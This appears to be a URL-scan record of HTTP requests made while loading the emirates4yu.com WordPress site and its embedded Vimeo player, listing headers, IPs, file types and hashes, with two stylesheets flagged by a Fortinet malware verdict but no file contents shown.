Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/gif
content-length: 50
cache-control: no-cache
access-control-allow-origin: *
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/19.png
35.190.203.220 200 OK 4.4 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/19.png
IP 35.190.203.220:0
File type PNG image data, 148 x 162, 8-bit/color RGBA, non-interlaced\012- data
Hash e7be4f692aea9e0383aa9ea868c7ffd8
99f9ef59c0a305a17128c9c3fa10976a05389f72
8d213e312365c53415370ec80f096cac8a282495bc0b0cc067b75546b918cdd2
GET /wp-content/uploads/2018/12/19.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22; pll_language=fr
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 4371
last-modified: Tue, 18 Dec 2018 12:22:05 GMT
etag: "5c18e66d-1113"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7
35.190.203.220 200 OK 5.9 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7
IP 35.190.203.220:0
File type ASCII text, with very long lines (4166)
Hash 78da0b50243f20ee1e9f91853cba2dbb
609c6abb42ed926f4402f6be4970785422f2e316
372fd821ed02b2f3133ae3f7fddbd317c7eeedd0685061934333d6d1991d2423
GET /wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 11 Mar 2022 00:15:40 GMT
etag: W/"622a94ac-18da"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3
35.190.203.220 200 OK 14 kB URL HTTP/2 emirates4yu.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (43771)
Hash 762470181f3432dca16adc22d3e0b11e
8d7e20df823b64e89bfe307a41e217b16b4a6e89
cc53f2bf13f731f6a5652563b57366df3aef309c5f79b90d97b7e06ddad5461a
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/css/dist/block-library/style.min.css?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 04 Jul 2022 12:10:37 GMT
etag: W/"62c2d8bd-15b64"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/all.min.css?ver=2.2.6.3
35.190.203.220 200 OK 22 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/all.min.css?ver=2.2.6.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (55782)
Hash 0a22757d3eac2daae93314edadc49e62
61f1383febae7c9486e74fb16989dde3e3441bf4
2978484036eafa517d6f2eeccce3afc7e421d1482da62dbe349e69f96f815204
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/all.min.css?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: W/"5dfcf62d-da9f"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/v4-shims.min.css?ver=2.2.6.3
35.190.203.220 200 OK 6.6 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/v4-shims.min.css?ver=2.2.6.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (26440)
Hash f1600ab083ba0458dbb5fbbafdd5ed48
e7656fe15a631fbd061a3d15dc4f940dd4be28b9
40140b2dbcaa89b345989a060e4dc9dfe5ddf2af33f85f813e59d08ed515f319
GET /wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/v4-shims.min.css?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: W/"5dfcf62d-6801"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/css/jquery.magnificpopup.min.css?ver=2.2.6.3
35.190.203.220 200 OK 4.6 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/css/jquery.magnificpopup.min.css?ver=2.2.6.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (5410), with no line terminators
Hash b7272b82a4933c1069a61aadd8479f34
20661316e916872d193f87f04ce414de70239d20
0ff2d2b5f0bb2dddb4b6ffbdd9f3c64f114696131b4252457362bca41e7188e7
GET /wp-content/plugins/beaver-builder-lite-version/css/jquery.magnificpopup.min.css?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: W/"5dfcf62d-1522"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/easy-columns/css/easy-columns.css
35.190.203.220 200 OK 1.2 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/easy-columns/css/easy-columns.css
IP 35.190.203.220:0
File type ASCII text, with CRLF line terminators
Hash cf8dc41b1fb0c4d8e4a73466a7a41c8e
a07071145b84ff5c3be113b4f75775b234745070
f869306e60143f28cef5fb923fedda3f054f843fca550fba11c4d2f8d2f7ae37
GET /wp-content/plugins/easy-columns/css/easy-columns.css HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 05 Oct 2017 11:37:07 GMT
etag: W/"59d61963-b20"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
player.vimeo.com/video/307072005?autoplay=1&loop=0&title=0&portrait=0&byline=0&color=c4944d&autopause=0&autoplay=1
162.159.138.60 200 OK 17 kB URL HTTP/1.1 player.vimeo.com/video/307072005?autoplay=1&loop=0&title=0&portrait=0&byline=0&color=c4944d&autopause=0&autoplay=1
IP 162.159.138.60:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (50233), with no line terminators
Hash 06c4fb24dd55d43030895b1cede9365c
e44b012c34b3a7b0f8e65ae0c5c77efd1770745a
92e5ab16d674cddb2efe1e156bbe1f6c2c6ce01500994b85de472ef883bdb15c
GET /video/307072005?autoplay=1&loop=0&title=0&portrait=0&byline=0&color=c4944d&autopause=0&autoplay=1 HTTP/1.1
Host: player.vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Date: Fri, 25 Nov 2022 12:02:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-xss-protection: 1; mode=block
content-security-policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' blob: resource: https://f.vimeocdn.com https://vimeo.com https://js-agent.newrelic.com https://imasdk.googleapis.com/ https://adservice.google.com/ https://s0.2mdn.net/instream/video/ https://bam.nr-data.net https://src.litix.io https://www.gstatic.com https://cdn.streamroot.io https://cdn.kollective.app/ https://wirewax.s3.eu-west-1.amazonaws.com https://edge-assets.wirewax.com https://embedder-sdk.wirewax.com https://embedder-sdk.wirewax.tv https://f.vimeocdn.com; style-src 'self' 'unsafe-inline' https://f.vimeocdn.com https://fonts.googleapis.com https://edge-assets.wirewax.com https://f.vimeocdn.com; connect-src 'self' ws: wss: https://vimeo.com https://vimeo.dev https://api.vimeo.com https://api.vimeo.dev https://*.ci.vimeows.com https://csi.gstatic.com https://fresnel-player-staging.vimeows.com https://fresnel-event-staging.vimeows.com https://player-telemetry.vimeo.com https://*.akamaized.net https://*.akamaized-staging.net https://*.vimeocdn.com https://netflux.cloud.vimeo.com https://lic.staging.drmtoday.com https://lic.drmtoday.com https://wv.service.expressplay.com https://fp.service.expressplay.com https://pr.service.expressplay.com https://sentry.io https://*.ingest.sentry.io https://storage.googleapis.com https://bam.nr-data.net https://live-api.cloud.vimeo.com https://live-api-dev.cloud.vimeo.com https://*.litix.io/ https://collector.vhx.tv https://collector.vhxstaging.com https://*.dna-delivery.com https://*.kollective.app/ https://mimir.cloud.vimeo.com https://*.wirewax.com https://*.wirewax.tv https://wirewax.s3.eu-west-1.amazonaws.com https://sqs.us-east-1.amazonaws.com https://sqs.eu-west-1.amazonaws.com https://s3-eu-west-1.amazonaws.com https://cognito-identity.us-east-1.amazonaws.com https://cognito-identity.eu-west-1.amazonaws.com; media-src 'self' blob: https://*.vimeocdn.com https://*.akamaized.net https://*.akamaized-staging.net https://*.gvt1.com 
https://live-api.cloud.vimeo.com https://live-api-dev.cloud.vimeo.com https://devcaptions.cloud.vimeo.com/; object-src 'self' https://*.vimeocdn.com https://*.akamaized.net https://*.akamaized-staging.net; default-src 'none'; font-src https://edge-assets.wirewax.com https://player.vimeo.com https://fonts.gstatic.com; img-src 'self' data: https://i.vimeocdn.com https://secure-b.vimeocdn.com https://f.vimeocdn.com https://vimeo.com https://secure.gravatar.com https://i0.wp.com https://i1.wp.com https://i2.wp.com https://pagead2.googlesyndication.com https://player.vimeo.com https://*.ci.vimeows.com https://videoapi-sprites.vimeocdn.com https://i.vimeocdn.com https://wirewax.s3.eu-west-1.amazonaws.com https://studio-media.wirewax.com https://edge-assets.wirewax.com https://maps.googleapis.com https://f.vimeocdn.com; frame-src 'self' https://*
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
link: <https://i.vimeocdn.com>; rel=preconnect; crossorigin, <https://f.vimeocdn.com>; rel=preconnect; crossorigin, <https://fresnel.vimeocdn.com>; rel=preconnect; crossorigin
p3p: CP="This is not a P3P policy! See https://vimeo.com/privacy"
expires: Fri, 25 Nov 2022 12:12:01 GMT
x-host: player-57c7694bdc-6qwpb
via: 1.1 varnish, 1.1 varnish
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
x-varnish-cache: 0
x-vserver: playproxy-rollout-prod-varnish-9
x-backend-proxy: playproxy10
x-bapp-server: player-57c7694bdc-6qwpb
Age: 0
X-Served-By: cache-bma1626-BMA
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1669377721.403064,VS0,VE331
Vary: Accept-Encoding
X-Player-Backend: p
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=8bjlwuEgc66pG6F7sd0uMSsIrdrfBa2l0DMyn.tRF.A-1669377721-0-ASXbD0PqpvV7ulmjKl9uGHggZtXJibe14Z2GP9KDNqKSa7EI4ju4XXA0JM4O4Iobi2j+ypGGR1ppP8Zx5lrAdDw=; path=/; expires=Fri, 25-Nov-22 12:32:01 GMT; domain=.vimeo.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 76fa3ba68a62b52d-OSL
Content-Encoding: gzip
f.vimeocdn.com/p/4.14.1/css/player.css
151.101.86.109 200 OK 21 kB URL HTTP/2 f.vimeocdn.com/p/4.14.1/css/player.css
IP 151.101.86.109:0
File type ASCII text, with very long lines (65495)
Hash 4acf7af3b78cc35650da87ee77464c29
abe870c3258849b8286439c8e06b7b885a1f1ac3
ed7715a1dab6ae7896cca6ae124ce68f61b8a502a7f468001142fdf9a81a3626
GET /p/4.14.1/css/player.css HTTP/1.1
Host: f.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: text/css
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Fri, 25 Nov 2022 12:02:01 GMT
age: 235409
x-served-by: cache-iad-kiad7000129-IAD, cache-bma1680-BMA
x-cache: HIT, HIT
x-cache-hits: 3, 60426
x-timer: S1669377722.841840,VS0,VE0
vary: Accept-Encoding,x-http-method-override
cache-control: max-age=1209600
access-control-allow-origin: *
content-length: 20726
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/assets/js/min/full-scripts.6.1.5.js?ver=1545605643
35.190.203.220 200 OK 192 kB URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/assets/js/min/full-scripts.6.1.5.js?ver=1545605643
IP 35.190.203.220:0
File type ASCII text, with very long lines (31986)
Size 192 kB (192515 bytes)
Hash 536f688a6619ba97c46c609ba221bbe5
203e720a85ad9d965873d110c20c2684ec4f99ff
f9f75cf8e2bfe0378fcee0941755adc90aa9964f9e15df21a7681f3e10c8b733
GET /wp-content/themes/jupiter/assets/js/min/full-scripts.6.1.5.js?ver=1545605643 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-4518b"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
f.vimeocdn.com/p/4.14.1/js/vendor.module.js
151.101.86.109 200 OK 116 kB URL HTTP/2 f.vimeocdn.com/p/4.14.1/js/vendor.module.js
IP 151.101.86.109:0
File type ASCII text, with very long lines (65457)
Size 116 kB (116187 bytes)
Hash 30972a3e9883ce81e7bb54ca377da88f
19077360603241f1fb218c44027d7d1437770d8d
10fb36a7c941c7565c0cb906cfeafc288aeaca33c293bbf3d1353f418eeb7d8f
GET /p/4.14.1/js/vendor.module.js HTTP/1.1
Host: f.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://f.vimeocdn.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/javascript
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Fri, 25 Nov 2022 12:02:02 GMT
age: 235410
x-served-by: cache-iad-kjyo7100028-IAD, cache-bma1680-BMA
x-cache: HIT, HIT
x-cache-hits: 3, 58986
x-timer: S1669377722.016002,VS0,VE0
vary: Accept-Encoding,x-http-method-override
cache-control: max-age=1209600
access-control-allow-origin: *
content-length: 116187
X-Firefox-Spdy: h2
f.vimeocdn.com/js_opt/modules/utils/vuid.min.js
151.101.86.109 200 OK 997 B URL HTTP/2 f.vimeocdn.com/js_opt/modules/utils/vuid.min.js
IP 151.101.86.109:0
File type ASCII text, with very long lines (1839)
Hash b81408535edef4b73951fa7683a0ecb4
2be1041a686c8d5130ce96600bc7ec68538b4cd9
7b68a0f94a2376708329d7fabc0000c92eb45755267bde5dc8983184b77f3ec7
GET /js_opt/modules/utils/vuid.min.js HTTP/1.1
Host: f.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/javascript
content-encoding: gzip
cache-control: public, max-age=2592000
timing-allow-origin: *
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Fri, 25 Nov 2022 12:02:02 GMT
age: 585883
x-served-by: cache-iad-kiad7000106-IAD, cache-bma1680-BMA
x-cache: HIT, HIT
x-cache-hits: 30, 104909
x-timer: S1669377722.196314,VS0,VE0
vary: Accept-Encoding,x-http-method-override
content-length: 997
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 6827d82f488045e02e40d6a2fdbae4b3
4944139a4b08769511ffc6aa913857d88a0db7bc
0e4ef6ddef97ec03d43df4c0bada61d792b9f030e4d9fab5bd3cf904aeaa3bc9
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10198
Expires: Fri, 25 Nov 2022 14:52:00 GMT
Date: Fri, 25 Nov 2022 12:02:02 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe021fc4e-f76c-4fe9-9470-b59452c93459.jpeg
34.120.237.76 200 OK 11 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe021fc4e-f76c-4fe9-9470-b59452c93459.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash eb94ecb5881a7e49d964e4287d11e7a4
4b131a189db1b615e2519a28cad83d78297ab67f
f3693e29eb7b72361093434142e3f18969c1a0b02350fab430fa29c7c127bd1a
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe021fc4e-f76c-4fe9-9470-b59452c93459.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 11401
x-amzn-requestid: 3bc374eb-7d70-4b95-94a7-2ad06cae4726
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEvCtHcmoAMFxgw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9211-333793987245ff9e741b9aed;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:35:13 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: kkI9Vh2vZeJPwz2JVL5MErsBBwk8-2Jo49yc0sFqv5pxIyBi6azFIw==
via: 1.1 8f22423015641505b8c857a37450d6c0.cloudfront.net (CloudFront), 1.1 d6b180eb367f7de26d67a9f3901b96a6.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 22:00:34 GMT
age: 50488
etag: "4b131a189db1b615e2519a28cad83d78297ab67f"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
i.vimeocdn.com/video/746942421-fb2e650771298bc27cc72cd0572616ddd0b3e167f2383463df2b7f9bfa88b69b-d?mw=600&mh=338
151.101.86.109 200 OK 19 kB URL HTTP/2 i.vimeocdn.com/video/746942421-fb2e650771298bc27cc72cd0572616ddd0b3e167f2383463df2b7f9bfa88b69b-d?mw=600&mh=338
IP 151.101.86.109:0
File type ISO Media, AVIF Image\012- data
Hash 027e10f56a4dca92f7dfbcb901745a51
909f363aabe35f0ee478abaa20ad57516f702e9a
bbf2c682d15b02591ec20a8d95674c7db66e8e7ec784d2287c04daaf8d1d3a38
GET /video/746942421-fb2e650771298bc27cc72cd0572616ddd0b3e167f2383463df2b7f9bfa88b69b-d?mw=600&mh=338 HTTP/1.1
Host: i.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: image/avif
etag: 027e10f56a4dca92f7dfbcb901745a51
x-viewmaster-lossless-format: automatic
viewmaster-server: viewmaster-us-central1-qx4d
cache-control: public, max-age=2592000
via: vvarnish, 1.1 varnish, 1.1 varnish
x-backend-server: varnish
access-control-allow-origin: *
access-control-expose-headers: X-Viewmaster-Status
access-control-max-age: 86400
accept-ranges: bytes
date: Fri, 25 Nov 2022 12:02:02 GMT
age: 1345069
x-served-by: cache-dfw-kdfw8210095-DFW, cache-bma1680-BMA
x-cache: miss, HIT, HIT
x-cache-hits: 10, 1
x-timer: S1669377722.240359,VS0,VE1
vary: Accept
content-length: 19010
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fca5cb469-21a0-420a-875c-a81635b33f53.jpeg
34.120.237.76 200 OK 8.0 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fca5cb469-21a0-420a-875c-a81635b33f53.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 92c78302bcce1568eb6a5563100b932c
43d1dec7fc06879988c9c3cadd800cc8145df988
0dda9914306c8e3a7ea75eade8e762652d93907dd6c5a8cc81707d6d8098b60a
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fca5cb469-21a0-420a-875c-a81635b33f53.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 7993
x-amzn-requestid: 9f0ff853-4819-47cd-959d-658401ea5748
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEvCsG5mIAMFqAQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9211-1c48b9223684f2942f8dd42d;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:35:13 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: 7YSXUV-LZpsI7vciFhuqt1EVr6YRkhxcOgMg8z8bxLcOE01_baf6Gg==
via: 1.1 d1151317ba32afe0e6370fd69fed222e.cloudfront.net (CloudFront), 1.1 1b74ccf4cb51eacf97a0e6d60ae46a3e.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 21:47:53 GMT
age: 51249
etag: "43d1dec7fc06879988c9c3cadd800cc8145df988"
content-type: image/jpeg
